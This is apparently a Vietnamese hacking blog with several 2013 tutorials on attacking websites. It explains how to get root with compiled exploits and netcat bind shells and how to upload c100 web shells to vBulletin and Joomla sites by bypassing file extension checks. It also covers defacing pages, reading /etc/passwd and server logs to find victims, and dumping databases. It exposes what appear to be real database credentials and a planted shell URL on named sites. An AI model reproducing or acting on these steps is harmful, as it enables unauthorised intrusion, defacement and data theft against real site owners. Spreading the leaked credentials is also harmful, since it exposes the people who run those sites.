TUT LOCAL

Thứ Sáu, 7 tháng 6, 2013

TUT Get Root Căn Bản

Công cụ

Code:

Shell
Netcat
Exploit

đầu tiên trong ô run command của shell gỏ

Code:

uname -a

Code:

less /proc/version

Nó sẽ hiện ra phiên bản linux

Code:

Linux 2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux

Chúng ta search exploit này ,sau đó lưu dưới dạng file.c
run command

Code:

gcc filename.c -o filename

mở hết quyền cho file này

Code:

chmod 777 filename

Bất netcat đã mở cổng và backdoor từ shell

Code:

C:\nc

nc IP port
ex:

Code:

nc 127.0.0.1 7777

Code:

nc -vv -l -p 7777

Code:

nc -vlp 443

Nếu thành công thì sẽ hiện

Code:

:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::

típ tục
id
nó sẽ hiện

Code:

id=99(nobody) gid=99(nobody)

Và bây h dùng exploit getroot

Code:

./file

típ tục

Code:

id

khi nó hiện

Code:

id=root gid=root groups=root

là thành công

1 so video get root
http://wn.com/qinory more »

[TUT]TẤT CẢ VỀ UPLOAD SHELL VBB

vấn đề này share đầy trên mạng , nhưng nhiều người vẫn hỏi , thui thì bỏ ít time làm viết bài tổng hợp về vấn đề này
1.Muốn up load được thì cần phải xác định victim dùng bản gì
hoặc view cái source ra cũng có thể xem được
ví dụ :
http://site.com/archive/archive.css
http://site.com/cpstyles/global.css <-- vBulletin 3.8.5 ( áp dụng cho all ver)
2. khi chiếm được vbb có pass admin thì ra đăng nhập vào admin ,( nếu ko tìm được link admin thì sym r00t để xem link admin, thằng admin change là gì)
đây là shell xml đủ loại để up qua plugin và skin
http://www.mediafire.com/?z5gnozvucwo ( dành cho ver 3)
3.shell plugin 4.1.5
http://www.mediafire.com/?ijj44735qj5nwkx ( video + shell)
4. cách này đỡ tốn time hơn nhiều ( tý update ảnh cho ae)
ví dụ ta có info thế này
site : kimthanhpro.com/admincp <-- đã bị đặt pass .htaccess

Code:

$config['Database']['dbname'] = 'kimthanh_ktf';
config['MasterServer']['servername'] = 'db.hostvn.net';
$config['MasterServer']['port'] = 3306;
$config['MasterServer']['username'] = 'kimthanh_ktf';
$config['MasterServer']['password'] = 'SoQuaDi123a@';

Code:

http://www.ongnuoc.com.vn/images/upload/alucar.php

server hostVN.net :">
và đây là cách video luôn cho ae xem chi tiết

Code:

http://www.4shared.com/rar/c05n5a6_/tmtno1.html

Đồ nghê :http://www.mediafire.com/?y63833jxjppld7s
http://www.webyog.com/en/ <-- dùng để kết nối với soft

[TUT] Hack – Deface một website như thế nào?

Trước tiên bạn cần có shell, c100, dưới đây là link của nó

Download Link 1: DL c100 false positive with Username/password protection- Mediafire

Download Link 2: DL c100 ReFUD không cần đến Username/password – Mediafire

Đầu tiên khi bạn tải về c100.php bạn sẽ cần phải chỉnh sửa nó bằng notepad. Và thiết lập Username và Password của bạn nếu bạn sử dụng liên kết tải về 1 nếu bạn sử dụng shell từ liên kết 2 thì bỏ qua bước này, để chỉ có một người biết người dùng / pw có thể truy cập shell và trang web.

Tên đăng nhập và chỉnh sửa mật khẩu như bạn muốn. Tuy nhiên, vượt qua md5 phải được mã hóa.

Sau khi mã hóa, bạn hãy lấy đoạn md5 và paste vào trong shell chỗ password

$login = “Dimitrije”; //login
//DON’T FORGOT ABOUT PASSWORD!!!
$pass = “hackforums”; //password
$md5_pass = “b54f268a2badf26e2499631f37d7b12e”; //md5-cryped pass. if null, md5($pass)

Khi bạn làm điều đó, lưu nó và bây giờ tìm thấy trên diễn ra trang web nơi bạn có thể tải lên một số tập tin. Đôi khi các trang web sẽ chặn php mở rộng, do đó bạn sẽ phải bỏ qua nó. Đầu tiên mở shell của bạn với notepad và sau đó Save As và thay đổi các phần mở rộng đến một trong các ví dụ dưới đây:

shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;

Nếu trang web không có bất cứ nơi nào mà bạn có thể tải lên các tập tin, nhưng có nơi bạn có thể thêm tin tức hay sự kiện mới hoặc một cái gì đó bạn có thể sử dụng meta http-equiv để làm cho chuyển hướng từ trang web xâm nhập vào trang của bạn. Bạn làm điều đó bằng cách thêm mã này:

<meta http-equiv=”refresh” content=”0;url=http://link_to_your_defacee_page”>

Một khi bạn tìm thấy quản trị bảng điều khiển upload shell của bạn, nếu bạn không thể tải php trực tiếp tải nó lên với phần mở rộng thay đổi như tôi đã nói ở trên.

Sau khi bạn đã tải lên nó tìm thấy các liên kết mà bạn đã tải lên, ví dụ nếu bạn đã tải lên trong hình ảnh sau đó nó sẽ được trong site/images/c100.php Sau khi bạn nhập liên kết Pop mới lên cửa sổ sẽ apear và nó sẽ hỏi bạn để đăng nhập. Ở đây bạn viết tên người dùng và mật khẩu của bạn đã viết của bạn trong c100.php. Sau đó, bạn sẽ nhận được trong website.

Đôi khi chỉ đơn giản là mở rộng ẩn sẽ không làm việc, do đó bạn sẽ phải sử dụng một trong những addon cho firefox Live HTTP Headers Cài đặt nó và sau đó ẩn phần mở rộng shell, đi đến phần tải lên. Mở Live HTTP Headers và tải lên shell. Bây giờ nếu bạn cố gắng để đi đến liên kết, nơi bạn có shell của bạn tải lên nó sẽ cho bạn lỗi (chỉ có trên một số trang web) vì vậy chúng tôi sẽ phải thay đổi điều đó lẩn php% 00.jpg vào php. Vì vậy, khi chúng tôi tải lên shell và mở HTTP Headers Live, bạn nên tìm nơi mà bạn đã tải lên shell của bạn. Bạn sẽ phải tìm đường, nơi ti viết rằng bạn đã tải lên shell. Chọn nó và sau đó nhấp vào nút trả lời.

Sau đó, bạn sẽ phải tìm thấy lại một lần nữa cùng một dòng mã trong đó cho thấy rằng bạn đã tải lên shell. Vì vậy, khi bạn tìm thấy nó chọn mở rộng mà bạn sử dụng để ẩn gốc php. Trong trường hợp của tôi, nó là 00.jpg% (Danh sách của tất cả các phần mở rộng được đưa ra trong hướng dẫn này ngay từ đầu). Khi bạn chọn nó xóa nó để chúng tôi có chỉ c100.php. Và sau đó một lần nữa nhấn vào trả lời.

Nó sẽ đưa bạn đến màn hình shell và nếu nó không, bạn sẽ phải tìm thủ công mà shell đã được tải lên và đi đến liên kết đó.Lưu ý: Điều này không làm việc cho mỗi trang web, nhưng làm việc cho rất nhiều. Bây giờ bạn đang ở trong trang web.

Tìm index.php chính và chỉnh sửa nó với mã nguồn trang web của bạn thay đổi nội dung, và bấm vào Save

Chúc bạn deface vui vẻ

Tìm user và domain

Khi local các bạn ít nhiều cũng gặp khó khăn khi tìm path của victim ,bài này mình sẽ chia sẻ 1 chút kinh nghiệm của mình.
Đầu tiên và cũng là cách đơn giản nhất ,đọc file /etc/passwd và đoán user dựa trên domain

cat /etc/passwd
less /etc/passwd

nếu bị server chặn lệnh cat ,bạn thử symlink nó

ln -s /etc/passwd list.txt

hoặc nếu hàm readfile chưa bị disable ,bạn cũng có thể tận dụng nó, tạo 1 file php nội dung như sau

<?php
readfile(‘/etc/passwd’);
?>

Sau đó tiến hành đoán ,user thường giống với domain ,đã loại bỏ kí tự “-” trong domain, đôi khi loại bỏ cả số trong domain.

Cách trên là cơ bản ,nếu domain của victim là domain chính của host ,còn trường hợp là addon domain thì bó tay sao ?
Thử tìm trong logs ,ở đây là error_log ,vào domain victim và tạo ra một error trên trang đó (404 chẳng hạn) rồi tiến hành đọc error_log

tail -1000 /usr/local/apache/logs/error_log

vì các file log này dung lượng rất lớn ,đọc toàn bộ là điểu không khả thi ,chúng ta chỉ cần 1000 dòng cuối cùng trong error_log này ,nó sẽ log cái error mà ta vừa tạo ra trên domain của victim.
Path log trên là khi host dùng cpanel ,đối với directadmin ta có thể tìm được ở /var/log/directadmin/error.log

Trường hợp domain victim dùng mod_rewrite ,tất cả các truy vấn đều hợp lệ thì error_log sẽ không được tạo ra ,thì ta sẽ tiếp tục đọc access_log ,sử dụng lệnh grep để tìm đúng domain mình cần.

grep -i ‘domain.com’ /usr/local/apache/logs/access_log

hoặc lệnh egrep để tìm nhiều domain cùng lúc

egrep -w ‘domain1|domain2|domain3′ /usr/local/apache/logs/access_log

Một số trường hợp có thể dùng

less /etc/virtual/domainowners
cat /var/cpanel/accounting.log

Hoặc dùng ssi:

<!–#exec cmd=”cat /etc/passwd”–>

Cuối cùng, cũng là cách mang tính hên xui rất cao nhưng không phải là không được đó là tìm trên google ,search với từ khóa

siteomain.com “warning”

Và như thế ,bất kì lỗi nào trên website domain.com bị google index đều hiện ra ,và biết đâu trong đó có path của file lỗi ,và thế là ta tìm được user của victim.

addon fire fox

tamper data
live https headers more »

Hướng Dẫn Up shell = Live Http headers

Đổi tên shell.php thành shell.jpg
khi upload lên sẽ được 1 file ảnh chạy ko đc ( file này chứa code của con shell )
dùng Addon Firefox: Live Http headers -> RePlay đến website -> chuyển định dạng 0.jpg -> 0.php
Video Hướng Dẫn:

[TUT] - Upload Shell Joomla For Newbie Part 1+ Part 2

Part 1:
http://www.mediafire.com/?5mirjrgob1wxhwc

Part 2: Hướng dẫn Local + Lấy Code & data Victim:

http://www.mediafire.com/?j2jmvi0g8a1pnaq

Chú ý:
1. đọc file config lấy info db của nó .
2. Conect vào db của nó và đổi pass md5 của admin
e10adc3949ba59abbe56e057f20f883e => 123456
3. Vào admin của web và đăng nhập với pass 123456 . Và up shell như ở part 1 .
4. Dùng con shell vừa up lên để up my sql dumper . Và thực hiện lấy data .

TUT LOCAL

Thứ Sáu, 7 tháng 6, 2013

TUT Get Root Căn Bản

TUT Get Root Căn Bản

[TUT]TẤT CẢ VỀ UPLOAD SHELL VBB

[TUT]TẤT CẢ VỀ UPLOAD SHELL VBB

Thứ Năm, 6 tháng 6, 2013

[TUT] Hack – Deface một website như thế nào?

Tìm user và domain

addon fire fox

Hướng Dẫn Up shell = Live Http headers

Thứ Ba, 4 tháng 6, 2013

[TUT] - Upload Shell Joomla For Newbie Part 1+ Part 2

[TUT] - Upload Shell Joomla For Newbie Part 1+ Part 2

Popular Posts

Chống Trung Cộng

Lịch sử

Linkie ♥

Followers